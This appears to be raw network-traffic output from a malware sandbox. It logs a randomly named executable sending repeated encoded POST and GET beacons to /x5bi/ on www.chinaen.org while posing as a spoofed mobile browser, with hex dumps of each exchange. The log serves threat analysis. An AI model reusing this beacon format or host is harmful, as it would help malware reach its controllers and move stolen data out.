                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 73 4c 61 38 7a 59 33 55 68 61 45 4b 4e 42 5a 34 36 6d 56 69 76 2b 30 76 31 57 35 73 69 2b 66 4b 30 67 66 71 4e 6b 61 69 4f 38 38 72 2b 46 41 61 47 64 71 2f 70 6f 41 70 33 36 57 6f 45 34 52 4e 44 2b 63 4b 4c 59 70 72 55 58 41 6d 79 71 70 6c 5a 4c 4a 6c 72 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sLa8zY3UhaEKNBZ46mViv+0v1W5si+fK0gfqNkaiO88r+FAaGdq/poAp36WoE4RND+cKLYprUXAmyqplZLJlrg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 11, 2024 22:57:54.255122900 CEST1003INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDhmZjk2MjgtYzllYy00OTk3LTg2MzgtNjhkNTgxZjlkMzE5IiwicGFnZV90aW1lIjoxNzI2MDg4Mj


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              53192.168.2.759714188.114.96.3805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:07.519224882 CEST693OUTPOST /x5bi/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.chinaen.org
                                                              Origin: http://www.chinaen.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.chinaen.org/x5bi/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 45 61 71 2f 39 73 31 41 6e 38 47 34 73 79 58 5a 44 49 52 41 59 69 68 43 4b 67 6f 58 45 5a 73 67 48 39 37 35 4e 31 30 7a 2b 53 6c 70 47 70 49 72 68 30 79 68 35 61 32 74 38 54 4a 79 6d 69 38 38 48 73 66 42 64 72 65 66 47 75 35 52 51 31 62 6c 62 31 50 56 79 34 49 55 4e 30 6a 31 57 57 76 34 39 6b 7a 57 4f 37 42 4c 6f 61 66 36 49 58 53 59 42 68 6d 35 6e 45 42 49 4e 44 6c 79 47 2f 39 63 5a 49 6e 55 43 73 53 52 4c 58 4a 41 58 70 2f 50 49 34 4f 34 75 6e 69 46 43 44 51 6c 35 6b 4f 51 49 51 73 55 6c 68 4c 6e 74 4b 2b 51 65 4a 62 71 35 76 6a 4c 44 57 45 66 31 31 37 68 4e 79 41 39 6e 42 52 6a 73 4e 58 4c 64 44 67 50 51 65 71 50 54 77 3d 3d
                                                              Data Ascii: XvhP6L=Eaq/9s1An8G4syXZDIRAYihCKgoXEZsgH975N10z+SlpGpIrh0yh5a2t8TJymi88HsfBdrefGu5RQ1blb1PVy4IUN0j1WWv49kzWO7BLoaf6IXSYBhm5nEBINDlyG/9cZInUCsSRLXJAXp/PI4O4uniFCDQl5kOQIQsUlhLntK+QeJbq5vjLDWEf117hNyA9nBRjsNXLdDgPQeqPTw==
                                                              Sep 11, 2024 22:58:08.562009096 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:58:08 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Product: Z-BlogPHP 1.7.3
                                                              X-XSS-Protection: 1; mode=block
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92Wdj3XRE%2FjkwsrG8whjbWBvclKY%2F6cMHWO4wsK7IOi5sFSz8YR6U%2B%2Bri1oOVawtrw8eQTWIwmxvDt8HgrsPp%2BiN6bYGPBq8OPU4ipWy9bl4WlKZBAUcVsKTZzsXRjNRyAk%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a92f79a2d43d4-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 61 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 6b 53 db c6 f6 33 99 c9 7f d8 ea 76 6a 98 c1 12 06 d2 07 b5 dd 69 3b 9d de 77 73 db f4 ce 9d 9b 9b 32 6b 69 6d 6f 22 69 15 69 6d 42 33 9d 31 0d 10 1c c2 a3 79 50 1e a6 84 24 94 34 29 86 24 90 12 9e 3f 26 5e 49 fe c4 5f b8 b3 92 6d 6c 08 26 a1 49 27 8c b1 bc bb e7 bd e7 b1 7b 14 7e 4b 21 32 ed 36 10 48 52 4d 8d 1e 3f 16 ae 3c 11 54 f8 53 43 14 02 39 09 4d 0b d1 88 90 a2 f1 e0 fb 42 65 5e 87 1a 8a 08 26 d2 15 64 22 53 00 32 d1 29 d2 69 44 e8 42 b1 73 98 ee 02 26 29 35 82 e8 7c 0a a7 23 c2 7f 82 5f 7f 1c fc 94 68 06 a4 38 a6 a2 2a ac bf 7c 16 41 4a 02 35 cb 49 93 68 28 12 da cb 08 1a 86 8a 65 18 53 51 50 41 69 2c 23 a1 82 6a c8 cd 1a 89 61 15 ed c5 49 63 d4 65 10 93 56 0b 87 15 9a 8c f8 14 82 de a0 59 c3 3a d6 52 5a d0 92 a1 8a 22 a1 66 ac 63 8a a1 5a 1e 7b 44 29 a6 2a 8a b6 b7 b4 bf 05 d8 e2 d3 c2 ea 90 bb f2 db ce c6 d5 e2 ec 4a 71 fa b6 9d bb 6f 67 b7 d8 c0 12 08 02 67 78 d0 cd f4 b9 43 77 dc 4c c6 be b1 ee dc 9c 2b 3c 1d 64 f9 27 61 c9 27 71 fc 58 [TRUNCATED]
                                                              Data Ascii: a50kS3vji;ws2kimo"iimB31yP$4)$?&^I_ml&I'{~K!26HRM?<TSC9MBe^&d"S2)iDBs&)5|#_h8*|AJ5Ih(eSQPAi,#jaIceVY:RZ"fcZ{D)*JqoggxCwL+<d'a'qXX94Q<"ptHRWW('.3!}LY$DPDDHh$8iv!hH.%jY]@f]l^-"PtJH'U-% w#!Ul/dX\mQI>t|VN#{,LCTKHGmL%#iNr'"gN(4^
                                                              Sep 11, 2024 22:58:08.562340021 CEST1236INData Raw: e4 a5 9c 70 8c 28 dd d1 e3 c7 8e 1f 0b 2b 38 0d 64 15 5a 56 44 a0 c4 e0 7e d5 50 3d c7 e3 19 62 1d 99 42 34 6c 19 50 e7 c4 bc 07 8e 86 25 fe af e0 b4 47 97 3f ab 11 39 1f 8e 75 10 3d e0 03 c4 c8 05 0f a6 06 48 25 09 e2 cf 36 84 61 7d 2f 12 a2 61
                                                              Data Ascii: p(+8dZVD~P=bB4lP%G?9u=H%6a}/a%\]GL KLECO4"_lR+A#:LkHaqQ*4/T*xifSBp+pZ)J;:JT6eA<n:wwK.:U%]R
                                                              Sep 11, 2024 22:58:08.562354088 CEST866INData Raw: fc d5 5d 7b 60 0f 6e 17 b7 26 f8 d2 e8 b0 b3 be e0 6e 4f b1 dc 1a 1f 8e 8c b1 ad 1f 0b ab 59 7b 3a e3 ac 0f 38 eb d7 ed c5 1b ee ca 14 8f b3 d7 49 fe 8d b0 ef 89 43 bc 6d 28 cb 46 96 9c 91 05 b6 30 6a df ec b3 7b 47 fc 14 bc b3 71 d5 1e 5f 2c ac
                                                              Data Ascii: ]{`n&nOY{:8ICm(F0j{Gq_,yX5sG=eZf_^{!*IMNV6<\/_QSkj:HrV6w%_DJPOmD*5|_"i 3$B&R'NVP^UEh
                                                              Sep 11, 2024 22:58:08.562962055 CEST22INData Raw: 63 0d 0a e3 e5 02 00 fa 29 f1 99 97 1e 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: c)0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              54192.168.2.759715188.114.96.3805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:10.068998098 CEST713OUTPOST /x5bi/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.chinaen.org
                                                              Origin: http://www.chinaen.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.chinaen.org/x5bi/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 45 61 71 2f 39 73 31 41 6e 38 47 34 71 6a 48 5a 47 72 4a 41 61 43 68 42 46 41 6f 58 4b 35 73 6b 48 39 6e 35 4e 30 78 75 2b 6b 31 70 47 4d 4d 72 6d 31 79 68 33 36 32 74 33 7a 49 34 6f 43 38 4e 48 73 54 7a 64 76 65 66 47 74 46 52 51 33 54 6c 61 43 54 57 77 6f 49 57 55 45 6a 33 4a 47 76 34 39 6b 7a 57 4f 37 55 6d 6f 61 48 36 4c 6b 4b 59 42 41 6d 32 72 6b 42 4c 62 54 6c 79 43 2f 39 51 5a 49 6e 32 43 74 65 2f 4c 56 78 41 58 6f 50 50 50 71 6d 37 35 58 69 44 47 44 52 48 2b 46 6a 75 53 6c 63 4c 38 78 44 63 33 74 2b 61 57 66 47 49 6a 4e 76 6e 64 48 38 6b 78 33 66 58 61 55 64 49 6c 41 56 37 68 76 6a 71 43 30 46 6c 64 4d 4c 4c 46 47 66 65 45 58 53 2b 6c 56 63 6d 41 74 4b 6d 59 64 4c 75 77 30 63 3d
                                                              Data Ascii: XvhP6L=Eaq/9s1An8G4qjHZGrJAaChBFAoXK5skH9n5N0xu+k1pGMMrm1yh362t3zI4oC8NHsTzdvefGtFRQ3TlaCTWwoIWUEj3JGv49kzWO7UmoaH6LkKYBAm2rkBLbTlyC/9QZIn2Cte/LVxAXoPPPqm75XiDGDRH+FjuSlcL8xDc3t+aWfGIjNvndH8kx3fXaUdIlAV7hvjqC0FldMLLFGfeEXS+lVcmAtKmYdLuw0c=
                                                              Sep 11, 2024 22:58:11.093650103 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:58:11 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Product: Z-BlogPHP 1.7.3
                                                              X-XSS-Protection: 1; mode=block
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXiRVfftg3JAv89xk2bLNujjfrQWM6Fe4os0VnvQBLCJl2T5c9acTASNmX%2Bu%2BbuRPN3SsHg52SFUreAEXYpUhmg9F%2FDIYZzJgWMCzBQMrt0PhwYtybKBx8mSqeBBY9VXTyI%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a93078f7043fd-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 61 35 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 6b 53 db c6 f6 33 99 c9 7f d8 ea 76 6a 98 c1 12 06 d2 07 b5 dd 69 3b 9d de 77 73 db f4 ce 9d 9b 9b 32 6b 69 6d 6f 22 69 15 69 6d 42 33 9d 31 0d 10 1c c2 a3 79 50 1e a6 84 24 94 34 29 86 24 90 12 9e 3f 26 5e 49 fe c4 5f b8 b3 92 6d 6c 08 26 a1 49 27 8c b1 bc bb e7 bd e7 b1 7b 14 7e 4b 21 32 ed 36 10 48 52 4d 8d 1e 3f 16 ae 3c 11 54 f8 53 43 14 02 39 09 4d 0b d1 88 90 a2 f1 e0 fb 42 65 5e 87 1a 8a 08 26 d2 15 64 22 53 00 32 d1 29 d2 69 44 e8 42 b1 73 98 ee 02 26 29 35 82 e8 7c 0a a7 23 c2 7f 82 5f 7f 1c fc 94 68 06 a4 38 a6 a2 2a ac bf 7c 16 41 4a 02 35 cb 49 93 68 28 12 da cb 08 1a 86 8a 65 18 53 51 50 41 69 2c 23 a1 82 6a c8 cd 1a 89 61 15 ed c5 49 63 d4 65 10 93 56 0b 87 15 9a 8c f8 14 82 de a0 59 c3 3a d6 52 5a d0 92 a1 8a 22 a1 66 ac 63 8a a1 5a 1e 7b 44 29 a6 2a 8a b6 b7 b4 bf 05 d8 e2 d3 c2 ea 90 bb f2 db ce c6 d5 e2 ec 4a 71 fa b6 9d bb 6f 67 b7 d8 c0 12 08 02 67 78 d0 cd f4 b9 43 77 dc 4c c6 be b1 ee dc 9c 2b 3c 1d 64 f9 27 61 c9 27 71 fc 58 [TRUNCATED]
                                                              Data Ascii: a5ckS3vji;ws2kimo"iimB31yP$4)$?&^I_ml&I'{~K!26HRM?<TSC9MBe^&d"S2)iDBs&)5|#_h8*|AJ5Ih(eSQPAi,#jaIceVY:RZ"fcZ{D)*JqoggxCwL+<d'a'qXX94Q<"ptHRWW('.3!}LY$DPDDHh$8iv!hH.%jY]@f]l^-"PtJH'U-% w#!Ul/dX\mQI>t|VN#{,LCTKHGmL%#iNr'"gN(4^p
                                                              Sep 11, 2024 22:58:11.093660116 CEST224INData Raw: 8c 28 dd d1 e3 c7 8e 1f 0b 2b 38 0d 64 15 5a 56 44 a0 c4 e0 7e d5 50 3d c7 e3 19 62 1d 99 42 34 6c 19 50 e7 c4 bc 07 8e 86 25 fe af e0 b4 47 97 3f ab 11 39 1f 8e 75 10 3d e0 03 c4 c8 05 0f a6 06 48 25 09 e2 cf 36 84 61 7d 2f 12 a2 61 ac 25 0e b3
                                                              Data Ascii: (+8dZVD~P=bB4lP%G?9u=H%6a}/a%\]GL KLECO4"_lR+A#:LkHaqQ*4/T*xifSBp+pZ)J;:JT6eA<n:
                                                              Sep 11, 2024 22:58:11.093668938 CEST1236INData Raw: 77 77 dd 4b 2e 3a 89 13 55 25 5d 87 a7 92 52 6c 78 44 4a c1 00 cd 04 af a6 9d 31 15 ea e7 84 a8 33 b1 5e 9c e8 e7 42 95 25 a8 e5 6f 21 68 ca c9 b2 00 71 62 6a a5 e2 56 5a 00 1a a2 49 a2 44 84 04 4f 75 50 a6 98 e8 07 4a e4 e3 70 41 3e 82 32 8d d4
                                                              Data Ascii: wwK.:U%]RlxDJ13^B%o!hqbjVZIDOuPJpA>2ncHhJPDUyRr RDJ4L+UB9ya,>WNi{aDj<~D>$)6i*IN|tF&9UkL
                                                              Sep 11, 2024 22:58:11.093673944 CEST655INData Raw: a0 c6 4e 56 c9 50 5e eb 55 d6 45 99 68 bb b7 b5 ff 06 3f 51 49 e2 e4 9f 4f 82 90 f8 9e d8 06 3e 49 61 55 01 a1 f7 da 5a 3f 38 b1 df 9b 4b ad 27 62 20 de a7 d4 89 89 e2 71 64 f2 77 2f d1 0a 21 6e 71 70 8a 37 14 0f 94 84 87 0a a6 5c 10 51 d6 a5 e7
                                                              Data Ascii: NVP^UEh?QIO>IaUZ?8K'b qdw/!nqp7\Q46{l6Y}QrISv/|)]z.34{W>sD;fBt$*u8nK0V(NM"M"X>VPTh&~ ]5}Xa_f


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              55192.168.2.759716188.114.96.3805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:12.618120909 CEST1726OUTPOST /x5bi/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.chinaen.org
                                                              Origin: http://www.chinaen.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.chinaen.org/x5bi/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 45 61 71 2f 39 73 31 41 6e 38 47 34 71 6a 48 5a 47 72 4a 41 61 43 68 42 46 41 6f 58 4b 35 73 6b 48 39 6e 35 4e 30 78 75 2b 6b 39 70 48 36 77 72 6d 53 4f 68 32 36 32 74 70 44 49 37 6f 43 38 71 48 74 37 4e 64 76 61 6c 47 72 4a 52 66 79 48 6c 50 48 6e 57 35 6f 49 57 4a 30 6a 32 57 57 76 58 39 6b 6a 53 4f 37 45 6d 6f 61 48 36 4c 6d 2b 59 49 78 6d 32 70 6b 42 49 4e 44 6c 2b 47 2f 38 35 5a 49 76 4d 43 74 4b 42 4c 45 52 41 58 49 66 50 4f 65 47 37 37 33 69 42 4b 6a 52 68 2b 46 76 4c 53 68 38 78 38 79 65 35 33 71 4b 61 47 65 7a 76 37 4f 4f 37 50 45 78 38 2b 31 58 50 55 56 51 2b 67 41 78 4c 71 64 58 78 4d 32 68 4f 57 75 72 47 4a 54 69 49 46 6b 57 42 6b 46 6b 69 47 49 76 74 50 39 6a 39 73 67 75 34 79 44 50 50 73 53 42 48 6e 55 54 48 79 54 64 51 39 43 6b 30 79 4a 65 31 36 4d 37 61 4d 66 35 6c 48 50 30 41 41 64 33 68 30 36 7a 75 4e 68 6f 71 32 4e 6c 6c 48 4c 39 61 4d 4b 74 7a 53 53 6f 42 6f 77 69 4d 50 6d 39 43 56 6b 64 30 4e 51 45 35 6f 61 4f 7a 4c 34 61 44 4d 72 52 5a 46 5a 7a 33 41 34 54 [TRUNCATED]
                                                              Data Ascii: XvhP6L=Eaq/9s1An8G4qjHZGrJAaChBFAoXK5skH9n5N0xu+k9pH6wrmSOh262tpDI7oC8qHt7NdvalGrJRfyHlPHnW5oIWJ0j2WWvX9kjSO7EmoaH6Lm+YIxm2pkBINDl+G/85ZIvMCtKBLERAXIfPOeG773iBKjRh+FvLSh8x8ye53qKaGezv7OO7PEx8+1XPUVQ+gAxLqdXxM2hOWurGJTiIFkWBkFkiGIvtP9j9sgu4yDPPsSBHnUTHyTdQ9Ck0yJe16M7aMf5lHP0AAd3h06zuNhoq2NllHL9aMKtzSSoBowiMPm9CVkd0NQE5oaOzL4aDMrRZFZz3A4T2rgQWMkpbi3xgy89uGKtNf/+7gsVZP0rlEegDXUyXWe3jfEI50Zo8OGWNwcpaEZnbptLd5ruTPmD9H9W5gDOpR/TQmn0F3C5rm4jnQPYXXDVFMM5VoS6aigL4AuSQXKT7s5t2TecAxiej0bgWtCidZDPaxFNN26A48Wx5fCBvayEJneFIGeSPFHqiZ8u6VJUZ/X9t5bKt8U2rCKGSGW3wazttD6tK2Z7v47/bo09wfE7zDUrgSzGiLG421mwPv1kU8J/OJgQRYXIjGjIK3ABsopZrG0mVISQAikico+BwTYI8BWsU3e8wwitVaOSOYQtVBPMaslolWDzr4arlU7QDQshfMqchLTFmcdMZodrQzf01EUfDOMWyi/7/hIWwsvJBBz+NygAGXRoFZgTsIl3JZEPYWxy+kaeTdFm9Rgj3ajIe5TQGSLFsktUtOP0xid/H3gwjV9s0brYnH9pwQVlKNcC4ek9bHkAr+rp/ZQaHZYtrmIAHthG1P1LryzBakRz1idbYbNH/2gqcbL2K5uNBZgRzxuZ488zYx6Dbww85BfL3EeJys9hTLLUPHPryK56zQx1/EilAJXq/g4F+GjQ7ZqDcLiQRAaEe5NhlEz5xVm4hmO2mxc3SJYVvuDBQEOuT7FhlOL3GF8RAxbEoV987w9N9ZJrxG16pX [TRUNCATED]
                                                              Sep 11, 2024 22:58:13.608714104 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:58:13 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Product: Z-BlogPHP 1.7.3
                                                              X-XSS-Protection: 1; mode=block
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqKl6BrJbH3ukjPgXID845WlmgfA8QHky%2BniyN6OVDriwlMOBAATDG08YYh4h7DiVlFWlr%2FQ1UNt9HSxEXoH3Cnz7eyA8k1UkmMR2yfc7pAF1mHGQvs7PO2ZDRBgVmfBtAM%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a93174b44c41d-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 61 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 6b 53 db c6 f6 33 99 c9 7f d8 ea 76 6a 98 c1 12 06 d2 07 b5 dd 69 3b 9d de 77 73 db f4 ce 9d 9b 9b 32 6b 69 6d 6f 22 69 15 69 6d 42 33 9d 31 0d 10 1c c2 a3 79 50 1e a6 84 24 94 34 29 86 24 90 12 9e 3f 26 5e 49 fe c4 5f b8 b3 92 6d 6c 08 26 a1 49 27 8c b1 bc bb e7 bd e7 b1 7b 14 7e 4b 21 32 ed 36 10 48 52 4d 8d 1e 3f 16 ae 3c 11 54 f8 53 43 14 02 39 09 4d 0b d1 88 90 a2 f1 e0 fb 42 65 5e 87 1a 8a 08 26 d2 15 64 22 53 00 32 d1 29 d2 69 44 e8 42 b1 73 98 ee 02 26 29 35 82 e8 7c 0a a7 23 c2 7f 82 5f 7f 1c fc 94 68 06 a4 38 a6 a2 2a ac bf 7c 16 41 4a 02 35 cb 49 93 68 28 12 da cb 08 1a 86 8a 65 18 53 51 50 41 69 2c 23 a1 82 6a c8 cd 1a 89 61 15 ed c5 49 63 d4 65 10 93 56 0b 87 15 9a 8c f8 14 82 de a0 59 c3 3a d6 52 5a d0 92 a1 8a 22 a1 66 ac 63 8a a1 5a 1e 7b 44 29 a6 2a 8a b6 b7 b4 bf 05 d8 e2 d3 c2 ea 90 bb f2 db ce c6 d5 e2 ec 4a 71 fa b6 9d bb 6f 67 b7 d8 c0 12 08 02 67 78 d0 cd f4 b9 43 77 dc 4c c6 be b1 ee dc 9c 2b 3c 1d 64 f9 27 61 c9 27 71 fc 58 [TRUNCATED]
                                                              Data Ascii: a50kS3vji;ws2kimo"iimB31yP$4)$?&^I_ml&I'{~K!26HRM?<TSC9MBe^&d"S2)iDBs&)5|#_h8*|AJ5Ih(eSQPAi,#jaIceVY:RZ"fcZ{D)*JqoggxCwL+<d'a'qXX94Q<"ptHRWW('.3!}LY$DPDDHh$8iv!hH.%jY]@f]l^-"PtJH'U-% w#!Ul/dX\mQI>t|VN#{,LCTKHGmL%#iNr'"gN(4^p(
                                                              Sep 11, 2024 22:58:13.608731985 CEST224INData Raw: dd d1 e3 c7 8e 1f 0b 2b 38 0d 64 15 5a 56 44 a0 c4 e0 7e d5 50 3d c7 e3 19 62 1d 99 42 34 6c 19 50 e7 c4 bc 07 8e 86 25 fe af e0 b4 47 97 3f ab 11 39 1f 8e 75 10 3d e0 03 c4 c8 05 0f a6 06 48 25 09 e2 cf 36 84 61 7d 2f 12 a2 61 ac 25 0e b3 5c 5d
                                                              Data Ascii: +8dZVD~P=bB4lP%G?9u=H%6a}/a%\]GL KLECO4"_lR+A#:LkHaqQ*4/T*xifSBp+pZ)J;:JT6eA<n:ww
                                                              Sep 11, 2024 22:58:13.608746052 CEST1236INData Raw: dd 4b 2e 3a 89 13 55 25 5d 87 a7 92 52 6c 78 44 4a c1 00 cd 04 af a6 9d 31 15 ea e7 84 a8 33 b1 5e 9c e8 e7 42 95 25 a8 e5 6f 21 68 ca c9 b2 00 71 62 6a a5 e2 56 5a 00 1a a2 49 a2 44 84 04 4f 75 50 a6 98 e8 07 4a e4 e3 70 41 3e 82 32 8d d4 d0 6e
                                                              Data Ascii: K.:U%]RlxDJ13^B%o!hqbjVZIDOuPJpA>2ncHhJPDUyRr RDJ4L+UB9ya,>WNi{aDj<~D>$)6i*IN|tF&9UkL 'C
                                                              Sep 11, 2024 22:58:13.608762026 CEST658INData Raw: 4e 56 c9 50 5e eb 55 d6 45 99 68 bb b7 b5 ff 06 3f 51 49 e2 e4 9f 4f 82 90 f8 9e d8 06 3e 49 61 55 01 a1 f7 da 5a 3f 38 b1 df 9b 4b ad 27 62 20 de a7 d4 89 89 e2 71 64 f2 77 2f d1 0a 21 6e 71 70 8a 37 14 0f 94 84 87 0a a6 5c 10 51 d6 a5 e7 34 a4
                                                              Data Ascii: NVP^UEh?QIO>IaUZ?8K'b qdw/!nqp7\Q46{l6Y}QrISv/|)]z.34{W>sD;fBt$*u8nK0V(NM"M"X>VPTh&~ ]5}Xa_fx


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              56192.168.2.759717188.114.96.3805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:15.159970999 CEST439OUTGET /x5bi/?XvhP6L=JYCf+ZJomMv21wL/A/ZbfBFGIgJsU/wUGcnjHUxnhitVEbVd5ES97oujxAxH+SE+IOTeV6meH+QeTEXNSn72wswjM27hcTXz9HzWUY9luI/8WXXgEAe/tU5ADSlVG/RuaZzqE+6xfFdK&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.chinaen.org
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:16.140569925 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:58:16 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Product: Z-BlogPHP 1.7.3
                                                              X-XSS-Protection: 1; mode=block
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i9MJq09%2BW9Mq3wEu%2BZ5XPtM3PrdzfbBDkf7KljLDx7CACf%2FbK2qBtQN0gBP%2Fnx0UFGrIR4NChHFPl20jTqpUFuSXH3BelFUiEMDOsRst%2F95Z0e4FFvv7scI5iz7hstSCIFU%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
